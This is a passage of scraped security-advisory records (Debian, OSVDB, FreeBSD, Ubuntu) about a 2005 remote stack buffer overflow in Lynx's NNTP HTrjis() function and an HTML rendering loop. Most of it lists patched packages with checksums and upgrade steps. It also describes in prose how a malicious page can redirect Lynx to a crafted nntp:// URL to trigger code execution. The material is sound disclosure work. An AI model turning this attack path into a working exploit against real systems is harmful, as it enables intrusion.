http://security.debian.org/pool/updates/main/l/lynx/lynx_2.8.5-2sarge1_mipsel.deb\n Size/MD5 checksum: 1889486 0b650edf6ca51547aedd7c7754bbda99\n\n PowerPC architecture:\n\n http://security.debian.org/pool/updates/main/l/lynx/lynx_2.8.5-2sarge1_powerpc.deb\n Size/MD5 checksum: 1878284 d90c1dc3fb2d5be179b827c32c14e222\n\n IBM S/390 architecture:\n\n http://security.debian.org/pool/updates/main/l/lynx/lynx_2.8.5-2sarge1_s390.deb\n Size/MD5 checksum: 1866758 60f30f0ebd7556799e565b4411a8d429\n\n Sun Sparc architecture:\n\n http://security.debian.org/pool/updates/main/l/lynx/lynx_2.8.5-2sarge1_sparc.deb\n Size/MD5 checksum: 1861536 85c12b7bd67f9800b49ab4b6b97a1dfd\n\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show &lt;pkg&gt;&#x27; and http://packages.debian.org/&lt;pkg&gt;\n\n", "modified": "2005-10-27T00:00:00", "published": "2005-10-27T00:00:00", "id": "DEBIAN:DSA-874-1:A85D0", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2005/msg00270.html", "title": "[SECURITY] [DSA 874-1] New lynx packages fix arbitrary code execution", "type": "debian", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-30T02:23:02", "bulletinFamily": "unix", "description": "- --------------------------------------------------------------------------\nDebian Security Advisory DSA 1085-1 security@debian.org\nhttp://www.debian.org/security/ Martin Schulze\nJune 1st, 2006 http://www.debian.org/security/faq\n- --------------------------------------------------------------------------\n\nPackage : lynx-ssl\nVulnerability : several\nProblem type : remote\nDebian-specific: no\nCVE IDs : CVE-2004-1617 CAN-2005-3120\nBugTraq ID : 11443\nDebian Bug : 296340\n\n\nSeveral vulnerabilities have been discoverd in lynx, the popular\ntext-mode WWW browser. The Common Vulnerabilities and Exposures\nProject identifies the following vulnerabilities:\n\nCVE-2004-1617\n\n Michal Zalewski discovered that lynx is not able to grok invalid\n HTML including a TEXTAREA tag with a large COLS value and a large\n tag name in an element that is not terminated, and loops forever\n trying to render the broken HTML.\n\nCAN-2005-3120\n\n Ulf H\u00e4rnhammar discovered a buffer overflow that can be remotely\n exploited. During the handling of Asian characters when connecting\n to an NNTP server lynx can be tricked to write past the boundary\n of a buffer which can lead to the execution of arbitrary code.\n\nFor the old stable distribution (woody) these problems have been fixed in\nversion 2.8.5-2.5woody1.\n\nFor the stable distribution (sarge) these problems have been fixed in\nversion 2.8.6-9sarge1.\n\nFor the unstable distribution (sid) these problems will be fixed soon.\n\nWe recommend that you upgrade your lynx-cur package.\n\n\nUpgrade Instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given at the end of this advisory:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 3.0 alias woody\n- --------------------------------\n\n Source archives:\n\n http://security.debian.org/pool/updates/main/l/lynx-cur/lynx-cur_2.8.5-2.5woody1.dsc\n Size/MD5 checksum: 640 e6f29a507e298508f72eb24c21b1bdde\n http://security.debian.org/pool/updates/main/l/lynx-cur/lynx-cur_2.8.5-2.5woody1.diff.gz\n Size/MD5 checksum: 634446 19fad72695b064d6a6e893bb1ea1006f\n http://security.debian.org/pool/updates/main/l/lynx-cur/lynx-cur_2.8.5.orig.tar.gz\n Size/MD5 checksum: 2557113 81764528e685747ec00e7e23f18fd6d3\n\n Architecture independent components:\n\n http://security.debian.org/pool/updates/main/l/lynx-cur/lynx-cur-wrapper_2.8.5-2.5woody1_all.deb\n Size/MD5 checksum: 161086 eec2317cf887d4d8762866c26b6783ad\n\n Alpha architecture:\n\n http://security.debian.org/pool/updates/main/l/lynx-cur/lynx-cur_2.8.5-2.5woody1_alpha.deb\n Size/MD5 checksum: 1419168 50e1763a404316ec33802c77f55180ee\n\n ARM architecture:\n\n http://security.debian.org/pool/updates/main/l/lynx-cur/lynx-cur_2.8.5-2.5woody1_arm.deb\n Size/MD5 checksum: 1292792 e922a7feefe43f2e0bff7713ed292403\n\n Intel IA-32 architecture:\n\n http://security.debian.org/pool/updates/main/l/lynx-cur/lynx-cur_2.8.5-2.5woody1_i386.deb\n Size/MD5 checksum: 1252720 667586b0cb239a23efaa03a45e44ba41\n\n Intel IA-64 architecture:\n\n http://security.debian.org/pool/updates/main/l/lynx-cur/lynx-cur_2.8.5-2.5woody1_ia64.deb\n Size/MD5 checksum: 1573108 88a04e9032f61055812cbbdc5b66ebcc\n\n HP Precision architecture:\n\n http://security.debian.org/pool/updates/main/l/lynx-cur/lynx-cur_2.8.5-2.5woody1_hppa.deb\n Size/MD5 checksum: 1361852 2cf253de737b654ee1cce1b13b43639a\n\n Motorola 680x0 architecture:\n\n http://security.debian.org/pool/updates/main/l/lynx-cur/lynx-cur_2.8.5-2.5woody1_m68k.deb\n Size/MD5 checksum: 1212894 07b758555efaeff043595c2338dece95\n\n Big endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/l/lynx-cur/lynx-cur_2.8.5-2.5woody1_mips.deb\n Size/MD5 checksum: 1314946 b737ed585f45a69a19f2f5314509918b\n\n Little endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/l/lynx-cur/lynx-cur_2.8.5-2.5woody1_mipsel.deb\n Size/MD5 checksum: 1310968 a82a5f1be84d27067c9b63b8af540dd6\n\n PowerPC architecture:\n\n http://security.debian.org/pool/updates/main/l/lynx-cur/lynx-cur_2.8.5-2.5woody1_powerpc.deb\n Size/MD5 checksum: 1299254 a5498c2256c092e2a8ebef012df0f4b2\n\n IBM S/390 architecture:\n\n http://security.debian.org/pool/updates/main/l/lynx-cur/lynx-cur_2.8.5-2.5woody1_s390.deb\n Size/MD5 checksum: 1271028 44125629519a455e212ae5397071e7bd\n\n Sun Sparc architecture:\n\n http://security.debian.org/pool/updates/main/l/lynx-cur/lynx-cur_2.8.5-2.5woody1_sparc.deb\n Size/MD5 checksum: 1297518 33c40521d500228c1973f4e67b424f40\n\n\nDebian GNU/Linux 3.1 alias sarge\n- --------------------------------\n\n Source archives:\n\n http://security.debian.org/pool/updates/main/l/lynx-cur/lynx-cur_2.8.6-9sarge1.dsc\n Size/MD5 checksum: 667 af1fc2fa2f7673145760fe57c0aea8fb\n http://security.debian.org/pool/updates/main/l/lynx-cur/lynx-cur_2.8.6-9sarge1.diff.gz\n Size/MD5 checksum: 5605374 2deb21954ef7e8e39dfd26abdf1f2e64\n http://security.debian.org/pool/updates/main/l/lynx-cur/lynx-cur_2.8.6.orig.tar.gz\n Size/MD5 checksum: 3023366 02f47f32cb2b96ea5dc1bd335e19ef4a\n\n Architecture independent components:\n\n http://security.debian.org/pool/updates/main/l/lynx-cur/lynx-cur-wrapper_2.8.6-9sarge1_all.deb\n Size/MD5 checksum: 12296 a615ca6b426011b3f40cd20ad48cb2cb\n\n Alpha architecture:\n\n http://security.debian.org/pool/updates/main/l/lynx-cur/lynx-cur_2.8.6-9sarge1_alpha.deb\n Size/MD5 checksum: 2017328 ff45d271444be4f6560372dfb0b274b2\n\n AMD64 architecture:\n\n http://security.debian.org/pool/updates/main/l/lynx-cur/lynx-cur_2.8.6-9sarge1_amd64.deb\n Size/MD5 checksum: 1901508 bb17d7c45e77910289765aec3f77c30c\n\n ARM architecture:\n\n http://security.debian.org/pool/updates/main/l/lynx-cur/lynx-cur_2.8.6-9sarge1_arm.deb\n Size/MD5 checksum: 1871322 2555b982f070c91e00348370eaa48244\n\n Intel IA-32 architecture:\n\n http://security.debian.org/pool/updates/main/l/lynx-cur/lynx-cur_2.8.6-9sarge1_i386.deb\n Size/MD5 checksum: 1876050 4dd3066564cd0fc919bc326c51686f26\n\n Intel IA-64 architecture:\n\n http://security.debian.org/pool/updates/main/l/lynx-cur/lynx-cur_2.8.6-9sarge1_ia64.deb\n Size/MD5 checksum: 2155322 3736a40dd67ccba9a9f90e44f6a8ada7\n\n HP Precision architecture:\n\n http://security.debian.org/pool/updates/main/l/lynx-cur/lynx-cur_2.8.6-9sarge1_hppa.deb\n Size/MD5 checksum: 1930998 6402a13b8834d92d2e01a306eb374d0f\n\n Motorola 680x0 architecture:\n\n http://security.debian.org/pool/updates/main/l/lynx-cur/lynx-cur_2.8.6-9sarge1_m68k.deb\n Size/MD5 checksum: 1797494 01b7c40f1acfcc91c2ac467c867503e9\n\n Big endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/l/lynx-cur/lynx-cur_2.8.6-9sarge1_mips.deb\n Size/MD5 checksum: 1914628 87ae23a7369ea464d3840653ac1522b6\n\n Little endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/l/lynx-cur/lynx-cur_2.8.6-9sarge1_mipsel.deb\n Size/MD5 checksum: 1911160 8cff5b755921183a11062644001e0759\n\n PowerPC architecture:\n\n http://security.debian.org/pool/updates/main/l/lynx-cur/lynx-cur_2.8.6-9sarge1_powerpc.deb\n Size/MD5 checksum: 1898106 e907c041632012ad322f3c701b6696cd\n\n IBM S/390 architecture:\n\n http://security.debian.org/pool/updates/main/l/lynx-cur/lynx-cur_2.8.6-9sarge1_s390.deb\n Size/MD5 checksum: 1886340 e2f640b6e388de70f160c6fe68dff134\n\n Sun Sparc architecture:\n\n http://security.debian.org/pool/updates/main/l/lynx-cur/lynx-cur_2.8.6-9sarge1_sparc.deb\n Size/MD5 checksum: 1878152 f0a57a2d5ac589bec4e7994bc3ac2030\n\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show &lt;pkg&gt;&#x27; and http://packages.debian.org/&lt;pkg&gt;\n\n", "modified": "2006-06-01T00:00:00", "published": "2006-06-01T00:00:00", "id": "DEBIAN:DSA-1085-1:3AB5E", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2006/msg00171.html", "title": "[SECURITY] [DSA 1085-1] New lynx-cur packages fix several vulnerabilities", "type": "debian", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "osvdb": [{"lastseen": "2017-04-28T13:20:16", "bulletinFamily": "software", "description": "# No description provided by the source\n\n## References:\nVendor URL: http://lynx.isc.org/\n[Vendor Specific Advisory URL](http://security.gentoo.org/glsa/glsa-200510-15.xml)\n[Vendor Specific Advisory URL](ftp://ftp.sco.com/pub/updates/UnixWare/SCOSA-2005.47/SCOSA-2005.47.txt)\n[Vendor Specific Advisory URL](http://support.avaya.com/elmodocs2/security/ASA-2006-010.htm)\n[Vendor Specific Advisory URL](http://www.ubuntu.com/usn/usn-206-1)\n[Vendor Specific Advisory URL](ftp://patches.sgi.com/support/free/security/advisories/20051003-01-U.asc)\n[Vendor Specific Advisory URL](ftp://ftp.sco.com/pub/updates/OpenServer/SCOSA-2006.7/SCOSA-2006.7.txt)\nSecurity Tracker: 1015065\n[Secunia Advisory ID:17216](https://secuniaresearch.flexerasoftware.com/advisories/17216/)\n[Secunia Advisory ID:17248](https://secuniaresearch.flexerasoftware.com/advisories/17248/)\n[Secunia Advisory ID:17340](https://secuniaresearch.flexerasoftware.com/advisories/17340/)\n[Secunia Advisory ID:20383](https://secuniaresearch.flexerasoftware.com/advisories/20383/)\n[Secunia Advisory ID:17150](https://secuniaresearch.flexerasoftware.com/advisories/17150/)\n[Secunia Advisory ID:17231](https://secuniaresearch.flexerasoftware.com/advisories/17231/)\n[Secunia Advisory ID:17230](https://secuniaresearch.flexerasoftware.com/advisories/17230/)\n[Secunia Advisory ID:17288](https://secuniaresearch.flexerasoftware.com/advisories/17288/)\n[Secunia Advisory ID:17335](https://secuniaresearch.flexerasoftware.com/advisories/17335/)\n[Secunia Advisory ID:17444](https://secuniaresearch.flexerasoftware.com/advisories/17444/)\n[Secunia Advisory ID:17445](https://secuniaresearch.flexerasoftware.com/advisories/17445/)\n[Secunia Advisory ID:18584](https://secuniaresearch.flexerasoftware.com/advisories/18584/)\n[Secunia Advisory ID:17238](https://secuniaresearch.flexerasoftware.com/advisories/17238/)\n[Secunia Advisory ID:17480](https://secuniaresearch.flexerasoftware.com/advisories/17480/)\n[Secunia Advisory ID:18376](https://secuniaresearch.flexerasoftware.com/advisories/18376/)\nRedHat RHSA: RHSA-2005:803\nOther Advisory URL: http://www.trustix.org/errata/2005/0055/\nOther Advisory URL: http://slackware.com/security/viewer.php?l=slackware-security&y=2005&m=slackware-security.423056\nOther Advisory URL: http://lists.suse.com/archive/suse-security-announce/2005-Nov/0001.html\nOther Advisory URL: http://www.us.debian.org/security/2006/dsa-1085\nOther Advisory URL: http://frontal1.mandriva.com/security/advisories?name=MDKSA-2005:186\nOther Advisory URL: http://www.debian.org/security/2005/dsa-874\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2005-10/0198.html\n[CVE-2005-3120](https://vulners.com/cve/CVE-2005-3120)\n", "modified": "2005-10-17T11:38:00", "published": "2005-10-17T11:38:00", "href": "https://vulners.com/osvdb/OSVDB:20019", "id": "OSVDB:20019", "type": "osvdb", "title": "Lynx NNTP HTrjis() Function Remote Overflow", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "freebsd": [{"lastseen": "2019-05-29T18:34:50", "bulletinFamily": "unix", "description": "\nUlf H\u00c3\u00a4rnhammar reports:\n\nWhen Lynx connects to an NNTP server to fetch information\n\t about the available articles in a newsgroup, it will\n\t call a function called HTrjis() with the information\n\t from certain article headers. The function adds missing\n\t ESC characters to certain data, to support Asian character\n\t sets. However, it does not check if it writes outside\n\t of the char array buf, and that causes a remote stack-based\n\t buffer overflow.\n\n", "modified": "2006-10-05T00:00:00", "published": "2005-10-17T00:00:00", "id": "C01170BF-4990-11DA-A1B8-000854D03344", "href": "https://vuxml.freebsd.org/freebsd/c01170bf-4990-11da-a1b8-000854d03344.html", "title": "lynx -- remote buffer overflow", "type": "freebsd", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:14", "bulletinFamily": "software", "description": "===========================================================\r\nUbuntu Security Notice USN-206-1 October 17, 2005\r\nlynx vulnerability\r\nCAN-2005-3120\r\n===========================================================\r\n\r\nA security issue affects the following Ubuntu releases:\r\n\r\nUbuntu 4.10 &#40;Warty Warthog&#41;\r\nUbuntu 5.04 &#40;Hoary Hedgehog&#41;\r\nUbuntu 5.10 &#40;Breezy Badger&#41;\r\n\r\nThe following packages are affected:\r\n\r\nlynx\r\n\r\nThe problem can be corrected by upgrading the affected package to\r\nversion 2.8.5-1ubuntu1.1 &#40;for Ubuntu 4.10&#41;, 2.8.5-2ubuntu0.5.04 &#40;for\r\nUbuntu 5.04&#41;, or 2.8.5-2ubuntu0.5.10 &#40;for Ubuntu 5.10&#41;. In general, a\r\nstandard system upgrade is sufficient to effect the necessary changes.\r\n\r\nDetails follow:\r\n\r\nUlf Harnhammar discovered a remote vulnerability in Lynx when\r\nconnecting to a news server &#40;NNTP&#41;. The function that added missing\r\nescape chararacters to article headers did not check the size of the\r\ntarget buffer. Specially crafted news entries could trigger a buffer\r\noverflow, which could be exploited to execute arbitrary code with the\r\nprivileges of the user running lynx. In order to exploit this, the\r\nuser is not even required to actively visit a news site with Lynx\r\nsince a malicious HTML page could automatically redirect to an nntp://\r\nURL with malicious news items.\r\n\r\n\r\nUpdated packages for Ubuntu 4.10:\r\n\r\n Source archives:\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/l/lynx/lynx_2.8.5-1ubuntu1.1.diff.gz\r\n Size/MD5: 17668 c5251ad9cead60e416cf21a461371877\r\n http://security.ubuntu.com/ubuntu/pool/main/l/lynx/lynx_2.8.5-1ubuntu1.1.dsc\r\n Size/MD5: 620 4b4310912f7f76fe01cf8312707be244\r\n http://security.ubuntu.com/ubuntu/pool/main/l/lynx/lynx_2.8.5.orig.tar.gz\r\n Size/MD5: 2984352 5f516a10596bd52c677f9bfd9579bc28\r\n\r\n amd64 architecture &#40;Athlon64, Opteron, EM64T Xeon&#41;\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/l/lynx/lynx_2.8.5-1ubuntu1.1_amd64.deb\r\n Size/MD5: 1882872 8be361fa3eead1e76cbbf2426c255c8b\r\n\r\n i386 architecture &#40;x86 compatible Intel/AMD&#41;\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/l/lynx/lynx_2.8.5-1ubuntu1.1_i386.deb\r\n Size/MD5: 1833368 d481856973186dd5d432e1102c49a917\r\n\r\n powerpc architecture &#40;Apple Macintosh G3/G4/G5&#41;\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/l/lynx/lynx_2.8.5-1ubuntu1.1_powerpc.deb\r\n Size/MD5: 1878484 1496a6331a4666295bd89703e509037a\r\n\r\nUpdated packages for Ubuntu 5.04:\r\n\r\n Source archives:\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/l/lynx/lynx_2.8.5-2ubuntu0.5.04.diff.gz\r\n Size/MD5: 18015 6171994c6c8f67d84267aa69d00ba292\r\n http://security.ubuntu.com/ubuntu/pool/main/l/lynx/lynx_2.8.5-2ubuntu0.5.04.dsc\r\n Size/MD5: 626 08ff9f5a955222f051e4e78101ef7c40\r\n http://security.ubuntu.com/ubuntu/pool/main/l/lynx/lynx_2.8.5.orig.tar.gz\r\n Size/MD5: 2984352 5f516a10596bd52c677f9bfd9579bc28\r\n\r\n amd64 architecture &#40;Athlon64, Opteron, EM64T Xeon&#41;\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/l/lynx/lynx_2.8.5-2ubuntu0.5.04_amd64.deb\r\n Size/MD5: 1881886 74bc70c3731c903e69fd74eb0a6d2d68\r\n\r\n i386 architecture &#40;x86 compatible Intel/AMD&#41;\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/l/lynx/lynx_2.8.5-2ubuntu0.5.04_i386.deb\r\n Size/MD5: 1832038 f2e333289856566f93f19ca8fd0c5dfd\r\n\r\n powerpc architecture &#40;Apple Macintosh G3/G4/G5&#41;\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/l/lynx/lynx_2.8.5-2ubuntu0.5.04_powerpc.deb\r\n Size/MD5: 1878380 6440d4eae5fadef31aaf21c5396ef401\r\n\r\nUpdated packages for Ubuntu 5.10:\r\n\r\n Source archives:\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/l/lynx/lynx_2.8.5-2ubuntu0.5.10.diff.gz\r\n Size/MD5: 18015 0f7b6e508094dabd59bee9018b368523\r\n http://security.ubuntu.com/ubuntu/pool/main/l/lynx/lynx_2.8.5-2ubuntu0.5.10.dsc\r\n Size/MD5: 626 2a90195b05000a7f318eb04386d1ad1c\r\n http://security.ubuntu.com/ubuntu/pool/main/l/lynx/lynx_2.8.5.orig.tar.gz\r\n Size/MD5: 2984352 5f516a10596bd52c677f9bfd9579bc28\r\n\r\n amd64 architecture &#40;Athlon64, Opteron, EM64T Xeon&#41;\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/l/lynx/lynx_2.8.5-2ubuntu0.5.10_amd64.deb\r\n Size/MD5: 1901120 c2e0da03f20b892aaea81d0f0588f7b1\r\n\r\n i386 architecture &#40;x86 compatible Intel/AMD&#41;\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/l/lynx/lynx_2.8.5-2ubuntu0.5.10_i386.deb\r\n Size/MD5: 1833214 7c021c0b0667d3aedc8479579d52e5ad\r\n\r\n powerpc architecture &#40;Apple Macintosh G3/G4/G5&#41;\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/l/lynx/lynx_2.8.5-2ubuntu0.5.10_powerpc.deb\r\n Size/MD5: 1881080 5ef72d193817f616e99f01113f6053dd", "modified": "2005-10-19T00:00:00", "published": "2005-10-19T00:00:00", "id": "SECURITYVULNS:DOC:9961", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:9961", "title": "[USN-206-1] Lynx vulnerability", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}